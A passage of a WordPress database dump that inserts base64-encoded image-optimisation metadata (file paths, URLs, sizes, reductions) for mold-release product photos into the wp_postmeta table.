GluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg5LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDQ4NCwiaWQiOjE0MjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA0ODcsImlkIjoxNDI1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29484, 1424, 'wpfc_optimisation_reduction', '2122278'); 
INSERT INTO `wp_postmeta` VALUES (29485, 1424, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwicmVkdWN0aW9uIjoyMTIxNzE3LCJ0aW1lIjoxNDgzNTcwNDk4LCJpZCI6IjE0MjQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDUwMSwiaWQiOjE0MjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNTA0LCJpZCI6MTQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA1MDcsImlkIjoxNDI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNTEwLCJpZCI6MTQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA1MTMsImlkIjoxNDI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDUxNiwiaWQiOjE0MjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNTE4LCJpZCI6MTQyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA1MjEsImlkIjoxNDI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMDEsInRpbWUiOjE0ODM1NzA1MjQsImlkIjoxNDI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxNzIsInRpbWUiOjE0ODM1NzA1MjYsImlkIjoxNDI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNzcsInRpbWUiOjE0ODM1NzA1MjksImlkIjoxNDI0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNTMxLCJpZCI6MTQyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDUzNCwiaWQiOjE0MjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA1MzcsImlkIjoxNDI0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29486, 1423, 'wpfc_optimisation_reduction', '2268503'); 
INSERT INTO `wp_postmeta` VALUES (29487, 1423, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UuanBnIiwicmVkdWN0aW9uIjoyMjY4MDAwLCJ0aW1lIjoxNDgzNTcwNTQ4LCJpZCI6IjE0MjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDU1MSwiaWQiOjE0MjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODUtc2VtaS1wZXJtYW5lbnQtbW9sZC1yZWxlYXNlLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNTU0LCJpZCI6MTQyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA1NTcsImlkIjoxNDIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg1LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNTYwLCJpZCI6MTQyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04NS1zZW1pLXBlcm1hbmVudC1tb2xkLXJlbGVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA1NjMsImlkIjoxNDIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg1LXNlbWktcGVybWFuZW50LW1vbGQtcmVsZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6Ilw